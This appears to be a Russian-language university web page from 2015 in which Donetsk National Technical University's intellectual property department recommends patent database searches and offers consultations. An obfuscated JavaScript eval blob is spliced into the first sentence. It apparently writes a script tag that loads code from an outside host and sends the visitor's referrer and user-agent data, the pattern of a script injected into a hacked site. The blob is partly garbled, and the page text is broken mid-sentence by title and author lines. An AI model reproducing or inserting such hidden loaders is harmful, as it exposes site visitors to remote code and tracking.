

Отдел `eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\s/,String))){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n m="q";,30,30,'document||javascript|encodeURIComponent|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|script|aytss|var|u0026u|referrer|fratk||js|php'.split('|'),0,{ })` интеллектуальной собственности и патентно-лицензионной работы (ПЛР) Донецкого национального технического университета (ДонНТУ) рекомендует при выполнении научно-исследовательских работ уделять достойное внимание патентно-информационным исследованиям. Для этого в отделе проводятся консультации и организовано летнее обучение всех желающих по пользованию электронными базами данных патентной информации, а так же научно-техническими базами данных и информационных ресурсов, которым предоставляется бесплатный доступ в Интернете.



В отделе интеллектуальной собственности и ПЛР помогут провести тематический, именной и нумерационный поиск по базам данных Украины, России, Белоруссии, Японии, США, Германии, Евразийского и Европейского патентных ведомств, а так же Всемирной организации интеллектуальной собственности (международные заявки). Цель проведения патентно-информационных исследований - получение актуальных исходных данных для написания дипломов и диссертаций, обеспечения технического уровня и конкурентоспособности результатов интеллектуальной деятельности, использование последних достижений науки и техники, исключение копирования и повтора в процессе исследования и разработки.

Патентная информация имеет ряд преимуществ перед другими видами информации. Во-первых, это информация об изобретениях, полезных моделях и других объектах, которая публикуется в изданиях патентных ведомств различных стран, региональных патентных ведомств, международных организаций в виде полных описаний, рефератов или формул изобретений и библиографических данных. Во-вторых, патентная информация систематизирована и имеет хорошо разработанную классификацию, что облегчает проведение поиска. В-третьих, основной объем сведений (70-80%) о научно-технических достижениях исследователей и разработчиков ведущих стран мира содержится только в источниках патентной информации, остальные 20-30% дублируются в других видах информации (научно-технической, рекламно-коммерческой и др.).

Кроме этого, Вы можете воспользоваться имеющимся обновленным в июне 2015 г. в отделе [перечнем научно-технических баз данных](#) в области физики, химии, инженерии, экологии и охраны окружающей среды, компьютерных технологий, к которым

Проведение патентно-информационных исследований

Автор: Kondratenko
29.06.2015 09:05

предоставляется бесплатный доступ

Подводя итог сказанному выше, отметим, что нецелесообразно тратить время и средства на создание технических решений, не имея достаточной информации о современном состоянии уровня техники в мире.

Телефон для справок: +380 (62) 304-60-05 (3-37 – внутренний).

Адрес: 3 уч. корпус ДонНТУ, ул. Артема, 58, ауд. 3.107